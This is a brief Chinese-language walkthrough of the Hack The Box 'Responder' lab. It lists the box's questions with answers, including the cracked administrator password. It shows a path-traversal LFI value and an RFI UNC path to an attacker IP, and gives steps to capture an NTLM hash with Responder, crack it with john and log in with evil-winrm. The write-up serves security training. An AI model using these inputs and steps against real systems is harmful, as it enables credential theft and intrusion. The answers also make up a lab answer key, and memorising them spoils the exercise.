hack the box responder
使用 IP 地址访问 Web 服务时,我们要重定向到的域是什么?
服务器上使用哪种脚本语言来生成网页?
抓取返回包判断
用于加载网页不同语言版本的 URL 参数的名称是什么?
根据提示,切换语言,可以发现答案是page
“page”参数的以下哪一个值是利用本地文件包含 (LFI) 漏洞的示例:“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”
“page”参数的以下哪一个值是利用远程文件包含 (RFI) 漏洞的示例:“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”
NTLM 代表什么?
我们在响应程序实用程序中使用哪个标志来指定网络接口?
administrator用户的密码是什么?
回答:badminton
首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解
使用responder监听本地tun0网卡
responder -I tun0
john 破解hash
我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP?
使用evil-winrm 进行登录
